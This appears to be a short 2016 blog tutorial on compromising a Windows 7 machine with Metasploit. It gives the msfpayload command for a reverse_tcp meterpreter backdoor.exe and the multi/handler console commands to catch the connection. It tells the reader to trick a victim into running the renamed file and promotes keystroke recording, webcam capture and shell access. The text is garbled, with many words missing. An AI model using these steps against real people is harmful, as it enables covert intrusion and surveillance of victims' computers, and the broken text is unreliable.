Thursday, May 26, 2016

How to with Metasploit | Backtrack 5 tutorial



In this tutorial i will a 7 Sp1 OS using Metasploit. i will be using the /multi/handler module which “provides all of the ftures of the Metasploit payload system to s that have been launched outside of the framework“

My tutorial on youtube :http://www.youtube.com/watch?v=GiofrKO-v8A
On mediafire free download: http://www.mediafire.com/?y57644ldvefsdqp



Commands used:msfpayload /meterpreter/reverse_tcp LHOST=”your Local I LPORT=”listening port” x > /root/backdoor.exe


I used port 4444 (you can choose your own port) for the LPORT which is the listening port and set the LHOST to the IP of the remote attacker which is obviously your Local IP address, my IP is xxx.xxx.xx.x.

After that, you should be able to see a file named as backdoor.exe in /root.

Send the file to the victim by using your Social Engineering skills and let him

click the file. You can change the name of the file so that it is not that obvious.

Launch Metasploit and set the by typing these commands in your msfconsole:


use /multi/handler
set payload /meterpreter/reverse_tcp
set lhost 192.128.168.128
set lport 4444







If all goes well, you should be able to establish a meterpreter session. Typesysinfoto gather some info on the machine. To know other commands

for the meterpreter type help. There are also other meterpreter commands
like capturing the screenshot of the PC, record trokes, capture asnapshot from a webcam, etc. To enter the command shell of the machine, typeshell.
it,s cool to take a screenshot with meterpreter commandscreenshot.

No comments:

Post a Comment